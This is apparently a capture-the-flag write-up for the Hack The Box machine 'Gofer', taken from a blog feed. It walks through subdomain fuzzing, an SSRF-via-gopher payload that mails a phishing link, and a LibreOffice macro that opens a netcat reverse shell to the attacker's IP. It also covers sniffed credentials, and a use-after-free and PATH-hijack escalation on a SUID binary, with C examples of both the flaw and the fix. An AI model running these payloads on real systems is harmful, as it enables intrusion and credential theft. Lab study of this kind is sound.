&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/macro1.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;With the document prepared, I sent the email to Jocelyn. The mail address &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jhudson@gofer.htb&lt;/code&gt; was easy enough to guess as it takes after the other known email addresses (e.g. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jdavis@gofer.htb&lt;/code&gt;).
The command to send is:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;mutt -s &quot;Hello Jocelyn!&quot; -a test.odt -- jhudson@gofer.htb
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;But you can’t send emails. Remember, port 25 is filtered.&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/mail.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Well that sucks. Now what?&lt;/p&gt;

&lt;h3 id=&quot;recon-pt-2&quot;&gt;Recon pt. 2&lt;/h3&gt;
&lt;p&gt;We’re going to make use of the most powerful recon tool in a hacker’s arsenal:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/htb_forums.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Nah, no begging. Let’s go back to the email. There’s supposedly a proxy in the works, but where is it? That’s what we need to find right now. Let’s fire up our discovery tools.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;wfuzz -Z -w /home/jerowin/Documents/htb/Machines/dynstr/subdomains-top1million-
110000.txt --hc 400,404 -u http://gofer.htb/ -H &quot;Host: FUZZ.gofer.htb&quot; --hl 9

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://gofer.htb/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000084:   401        14 L     54 W       462 Ch      &quot;proxy&quot;                                                                                                                      

Total time: 161.1278
Processed Requests: 114441
Filtered Requests: 114440
Requests/sec.: 710.2496
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The first rounds of discovery didn’t turn up much. No additional paths were discovered so we need to see if there are subdomains. For this part, be mindful of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/etc/hosts&lt;/code&gt; file. Only domains associated with the target IP will be resolved. Since we don’t know the subdomain yet, we need to use a technique to check. Fortunately we can fuzz through the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Host&lt;/code&gt; header. We hit a subdomain named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;proxy&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Okay, we avoided defeat this time. But we’re not yet out of the woods. Notice that our fuzz returned &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP 401&lt;/code&gt;. That’s not good. We’re locked out and this was our only lead up until recently. Being a proxy, there might be a way to probe it deeper, but how? For that we’ll need to fuzz further:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/fuzz2.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;After several rounds of fuzzing I was somewhat ready to call it a day but then I noticed something interesting. There are some methods not implemented. That could be an interesting venture. What if we paired it with path/file discovery?&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/fuzz.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Wow, we actually found something. Turns out there are some specific methods not implemented. But any other method will do:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/fuzz3.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/fuzz4.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;em&gt;If you&apos;re wondering, no this is not a reskinned burpsuite. Check out &lt;a href=&quot;https://caido.io&quot; target=&quot;_blank&quot;&gt;caido&lt;/a&gt; which is sublime for burp I guess?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Turns out I can substitute any method name as long as it is not &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;TRACE&lt;/code&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CONNECT&lt;/code&gt;. We found our next entry point &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;index.php&lt;/code&gt;! And it seems to require a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;URL&lt;/code&gt; parameter. What if we were a bit naughty with this parameter?&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/rfi1.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/rfi2.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Cool, we got ourselves SSRF. But this is Gofer right? There must be some sense to this challenge with that kind of name. So we’ll need to make use of SSRF w/ gopher protocol.&lt;/p&gt;

&lt;h3 id=&quot;ssrf-w-gopher&quot;&gt;SSRF w/ gopher&lt;/h3&gt;
&lt;p&gt;Looking at &lt;a href=&quot;https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery&quot; target=&quot;_blank&quot;&gt;this&lt;/a&gt;, there’s something we can try which is a synthesis of details we’ve gathered:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The machine name&lt;/li&gt;
  &lt;li&gt;Email is only available internally, as evidenced by port 25 being filtered and the backed up email&lt;/li&gt;
  &lt;li&gt;Someone who likes to click links from emails&lt;/li&gt;
  &lt;li&gt;Support for ODT documents via Libreoffice.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So our plan of attack may look something like this:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Create an ODT document w/ a malicious macro (Done)&lt;/li&gt;
  &lt;li&gt;Edit the macro to create a reverse shell to a netcat listener&lt;/li&gt;
  &lt;li&gt;Serve the document via http server (Done)&lt;/li&gt;
  &lt;li&gt;Trigger SSRF via the Proxy + gopher protocol&lt;/li&gt;
  &lt;li&gt;Target the SMTP service to mail Jocelyn a link to our ODT document.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We will use this macro:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;REM  *****  BASIC  *****

Sub Main
	Shell(&quot;nc 10.10.14.114 4444 -e sh&quot;)
End Sub
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;After the change, we need to craft the SSRF payload to talk with the SMTP server. Let’s see how this can be done. We need to check if gopher is actually available:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/ssrf1.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Looks like there’s a blacklist in place. Fortunately, there are countless ways for us to try and overcome this (check out this &lt;a href=&quot;https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#bypassing-filters&quot; target=&quot;_blank&quot;&gt;guide&lt;/a&gt;). Here is a payload we can try&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;TEST /index.php?url=gopher://2130706433:25/xHELO%20gofer.htb%250d%250a
MAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@
gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker
@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate
%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject
%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20
magic%20word%20%21%20&amp;lt;a+href%3d&apos;http%3a//10.10.14.114:8000/test.odt&amp;gt;
this&amp;lt;/a&amp;gt;%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;For legibility, let’s decode it:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;gopher://2130706433:25 # 127.0.0.1 converted to decimal.
		       # Don&apos;t worry, it&apos;s RFC compliant!
/xHELO gofer.htb%0d%0a # SMTP commands to send the email
MAIL FROM:&amp;lt;hacker@site.com&amp;gt;%0d%0a
RCPT TO:&amp;lt;jhudson@gofer.htb&amp;gt;%0d%0a # Our target&apos;s mail address
DATA%0d%0a
From: [Hacker] &amp;lt;hacker@site.com&amp;gt;%0d%0a
To: &amp;lt;jhudson@gofer.htb&amp;gt;%0d%0a
Date: Tue, 15 Sep 2017 17:20:26 -0400%0d%0a
Subject: AH AH AH%0d%0a
%0d%0a
You didn&apos;t say the magic word ! &amp;lt;a href=&apos;http://10.10.
14.114:8000/test.odt&apos;&amp;gt;this&amp;lt;/a&amp;gt;%0d%0a # A hyperlink via HTML
%0d%0a%0d%0a.%0d%0a
QUIT%0d%0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Remember Jocelyn likes links so we included a link to our ODT document. If everything was written just right, sending this payload will trigger the SSRF:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/ssrf2.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/ssrf3.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Okay I didn’t just show you the same screenshot twice, notice that we obtained a shell. Great.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/flag1.png&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;the-route-to-root&quot;&gt;The Route to Root&lt;/h3&gt;
&lt;p&gt;Sorry for the pun. Couldn’t help myself. Anyway.
Now that we have a foothold, we need to make ourselves root. Let’s do some more recon:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/stickybits.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;A good escalation point would be to look at the available files with SUID. After a quick look around we have some files with sticky bits.
What stands out the most is the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;notes&lt;/code&gt; binary that can only be executed by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;root&lt;/code&gt; or someone from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dev&lt;/code&gt;.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/groups.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Currently we are not in the same group as Tom, who is from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dev&lt;/code&gt;. We’re in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netdev&lt;/code&gt;, otherwise known as “the hacker’s wet dream” department.
Anyway, we’ll need to access the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dev&lt;/code&gt; group somehow, but how?
Looking around, we have access to the credentials for the proxy from earlier. Maybe we can crack them?&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/htpasswd.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Nah, crack that. No easy wins for challenges like these. Let’s probe further.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/traffic.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We can see a lot of HTTP traffic coming in. Curiously, some of it originates internally, from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;127.0.0.1&lt;/code&gt;.
Running linpeas gives us some interesting info: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tcpdump&lt;/code&gt; is usable by our user, so we can sniff that loopback traffic.&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/linpeas1.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/linpeas2.png&quot; /&gt;&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;tcpdump -i lo -A
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Seemed like a longshot to be honest. When you run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;linpeas&lt;/code&gt;, you know you’re out of options by that point. But then again it’s prudent to use tools when covering bases.&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/tcpdump.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;At first glance, I thought this came from people trying to bruteforce the proxy. But then again, I am sniffing the loopback interface, so this clearly came from inside. When we decode the creds, we get Tom’s creds!&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;rax2 -D dGJ1Y2tsZXk6b29QNGRpZXRpZTNvX2hxdWFldGk=
tbuckley:ooP4dietie3o_hquaeti
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/ssh.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Cracking the htpasswd hash, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hashcat -m 1600 hash decoded&lt;/code&gt; (mode 1600 is Apache’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;$apr1$&lt;/code&gt; MD5 format), yields the same password, so the sniffed credentials are confirmed.
All that’s left is to leverage the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;notes&lt;/code&gt; binary.&lt;/p&gt;

&lt;h3 id=&quot;lazy-re&quot;&gt;Lazy RE&lt;/h3&gt;
&lt;p&gt;I usually use a disassembler/debugger for this part but decided against it. The binary was easy to understand by simply playing around with it.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/notes1.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;This binary creates users and notes that only exist in memory while it’s running. A user is given the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;user&lt;/code&gt; role by default. Option 8 is reserved for users with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;admin&lt;/code&gt; role, but there is no option to switch to, assign or create that role.&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/notes2.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/notes3.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Looking at the strings output, we can see the input length limits for the username and for notes, 23 and 39 characters respectively.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/notes_strings.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Interestingly, we can see the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tar -czvf /root/backups/backup_notes.tar.gz /opt/notes&lt;/code&gt;. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tar&lt;/code&gt; is invoked by bare name rather than by absolute path, so when the SUID binary runs this command it will execute whichever &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tar&lt;/code&gt; comes first in our &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PATH&lt;/code&gt;: a classic PATH hijack. But this command is only reachable via Option 8. That is the puzzle we must solve.&lt;/p&gt;

&lt;p&gt;Let’s generate a cyclic pattern so we can tell at which offset our input starts clobbering other data:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;ragg2 -P 24 -r
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;If we write a note longer than the username field, we can observe that the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Role&lt;/code&gt; value was modified. Note also, in the session below, that the user is still displayed after being deleted:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;tbuckley@gofer:~$ notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 1

Choose an username: test

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: test
Role: user

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 4

Write your note:
test
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 3

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: 
Role: user

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 4

Write your note:
AAABAACAADAAEAAFAAGAAHAA
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: AAABAACAADAAEAAFAAGAAHAA
Role: 

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/notes4.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;We can observe the following:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Creating a user creates two adjacent fields, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;user&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;role&lt;/code&gt;, in one allocation&lt;/li&gt;
  &lt;li&gt;Deleting the user releases that allocation, but the program keeps using it: “Show user information” still prints the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;role&lt;/code&gt; afterwards, which is a use-after-free&lt;/li&gt;
  &lt;li&gt;Writing a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;note&lt;/code&gt; evidently reuses the freed allocation: the note shows up as the username, and anything past the 24-byte username field overwrites the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;role&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
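&lt;p&gt;To make the mechanism concrete, here is a small C model of the user/note handling that replays the same sequence. This is an added example, not the Gofer binary’s source: the 23-character username and 39-character note limits come from the strings output above, while the struct layout (username directly followed by a role field, 40 bytes in total) and the glibc tcache behaviour it relies on are assumptions.&lt;/p&gt;
<![CDATA[
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define USERNAME_MAX 23   /* %23s in the binary's strings output */
#define NOTE_MAX     39   /* %39s */

/* Assumed layout: username directly followed by role, 40 bytes in all, so a
 * user and a note (39 chars + NUL = 40 bytes) fall in the same malloc size class. */
struct user {
    char username[USERNAME_MAX + 1];
    char role[16];
};

static struct user *current_user;   /* left dangling by delete_user_vuln() */
static char *current_note;

void create_user(const char *name) {
    current_user = malloc(sizeof *current_user);
    if (current_user == NULL) exit(1);
    snprintf(current_user->username, sizeof current_user->username, "%s", name);
    strcpy(current_user->role, "user");             /* default role */
}

void delete_user_vuln(void) {
    free(current_user);                             /* BUG: pointer kept and used later */
}

void delete_user_fixed(void) {
    free(current_user);
    current_user = NULL;                            /* every later use checks for NULL */
}

void write_note(const char *text) {
    current_note = malloc(NOTE_MAX + 1);            /* 40 bytes: same size class as struct user */
    if (current_note == NULL) exit(1);
    snprintf(current_note, NOTE_MAX + 1, "%s", text);
}

int is_admin(void) {
    return current_user != NULL && strcmp(current_user->role, "admin") == 0;
}

/* Replays the session above: create a user, delete it, then write a note of
 * 24 filler bytes followed by "admin".  On glibc the freed user chunk sits in
 * tcache and is handed straight back to write_note(), so note bytes 0..23 land
 * on username and "admin" lands exactly on role.  Returns 1 if role now reads
 * "admin", 0 otherwise (including when the allocator returned a different chunk). */
int escalate(int use_fixed_delete) {
    char payload[NOTE_MAX + 1];
    memset(payload, 'A', USERNAME_MAX + 1);         /* fills the username field */
    memcpy(payload + USERNAME_MAX + 1, "admin", 6); /* offset 24: the role field */

    create_user("test");
    if (use_fixed_delete) delete_user_fixed(); else delete_user_vuln();
    write_note(payload);

    int admin = 0;
    if (use_fixed_delete)
        admin = is_admin();                         /* current_user is NULL: always 0 */
    else if ((void *)current_note == (void *)current_user)
        admin = is_admin();                         /* note and stale user overlap */

    free(current_note);                             /* current_user aliases it or is NULL */
    current_note = NULL;
    current_user = NULL;
    return admin;
}

int main(void) {
    printf("vulnerable delete: role is admin? %d\n", escalate(0));
    printf("fixed delete:      role is admin? %d\n", escalate(1));
    return 0;
}
```
]]>
&lt;p&gt;Run stand-alone, the program reports 1 for the vulnerable delete and 0 for the fixed one. The fix is not just clearing the pointer: every later menu option has to check it, and a role that decides who may run a privileged backup should not live in memory a less privileged input can reach.&lt;/p&gt;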

&lt;p&gt;Given these observations, we can try to overwrite the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;role&lt;/code&gt; field with the value &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;admin&lt;/code&gt;: delete the user so its allocation is released, then write a note consisting of 24 filler bytes followed by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;admin&lt;/code&gt;:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/notes5.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Looks like that worked. Having overwritten the role, we have essentially escalated our privileges inside the program and gained the ability to backup notes. But we don’t really want to backup silly notes. We want the root flag. Let’s create our own &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tar&lt;/code&gt; script, put its directory at the front of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PATH&lt;/code&gt;, and have the backup execute it as root instead of the real &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tar&lt;/code&gt; (if the spawned shell drops the effective UID, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bash -p&lt;/code&gt; keeps it):&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;#!/bin/bash
# contents of our fake tar, placed in a directory at the front of PATH
bash -i
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
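&lt;p&gt;Why a bare &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tar&lt;/code&gt; in a SUID binary is exploitable, and what the safe call looks like, as an added C example (not the notes binary’s code): the vulnerable variant mirrors the command seen in strings, the hardened variant uses &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;execve&lt;/code&gt; with an absolute path (assumed to be &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/bin/tar&lt;/code&gt;) and a fixed environment, and a helper builds a throwaway fake tar in a temporary directory, prepends it to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PATH&lt;/code&gt; exactly as the escalation does, and reports whether it ran. The fake tar only drops a marker file, standing in for the interactive shell above.&lt;/p&gt;
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* What the strings output suggests the notes binary does: system() hands the
 * line to /bin/sh, which resolves the bare "tar" through the caller's PATH and
 * inherits the caller's whole environment.  Returns the system() status. */
int backup_vuln(const char *src, const char *dest) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "tar -czf '%s' '%s' >/dev/null 2>&1", dest, src);
    return system(cmd);
}

/* Hardened form: no shell, an absolute path (assumed /bin/tar) and a fixed
 * environment.  A real SUID program should also drop privileges before the
 * exec when the backup does not need root. */
int backup_fixed(const char *src, const char *dest) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"tar", "-czf", (char *)dest, (char *)src, NULL};
        char *const envp[] = {"PATH=/usr/bin:/bin", NULL};   /* caller's PATH is ignored */
        int devnull = open("/dev/null", O_WRONLY);
        if (devnull >= 0) { dup2(devnull, 1); dup2(devnull, 2); close(devnull); }
        execve("/bin/tar", argv, envp);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return status;
}

/* Demonstration harness.  Builds a throwaway directory with a fake "tar" that
 * only creates a marker file (it stands in for "bash -i"), prepends that
 * directory to PATH as the escalation does, runs the given backup routine and
 * reports whether the fake tar ran: 1 = hijacked, 0 = not, -1 = setup failed. */
int run_with_fake_tar(int (*backup)(const char *, const char *)) {
    char dir[] = "/tmp/fake-tar-XXXXXX";
    if (mkdtemp(dir) == NULL) return -1;
    char script[64], marker[64], archive[64], path[4096];
    snprintf(script, sizeof script, "%s/tar", dir);
    snprintf(marker, sizeof marker, "%s/marker", dir);
    snprintf(archive, sizeof archive, "%s/out.tar.gz", dir);

    FILE *f = fopen(script, "w");
    if (f == NULL) return -1;
    fprintf(f, "#!/bin/sh\n: > '%s'\n", marker);
    fclose(f);
    chmod(script, 0755);

    const char *env = getenv("PATH");
    char *old_path = env ? strdup(env) : NULL;
    snprintf(path, sizeof path, "%s:%s", dir, old_path ? old_path : "/usr/bin:/bin");
    setenv("PATH", path, 1);

    backup(dir, archive);   /* src exists, so a real tar would simply succeed */

    int hijacked = access(marker, F_OK) == 0;
    if (old_path) { setenv("PATH", old_path, 1); free(old_path); } else unsetenv("PATH");
    unlink(marker); unlink(script); unlink(archive); rmdir(dir);
    return hijacked;
}

int main(void) {
    printf("system(\"tar ...\")       hijacked: %d\n", run_with_fake_tar(backup_vuln));
    printf("execve(\"/bin/tar\", ...) hijacked: %d\n", run_with_fake_tar(backup_fixed));
    return 0;
}
```
]]>
&lt;p&gt;The harness prints 1 for the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;system()&lt;/code&gt; variant and 0 for the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;execve&lt;/code&gt; variant with the same poisoned &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PATH&lt;/code&gt;. The hardened version does not even consult &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PATH&lt;/code&gt;, which is the property to check for in any SUID program that spawns helpers.&lt;/p&gt;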
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/suid_exploit.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;After that, all that’s left is to get the flag:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/root_flag.png&quot; /&gt;&lt;/p&gt;
</description>
        
          <description>&lt;h3 id=&quot;intro&quot;&gt;Intro&lt;/h3&gt;
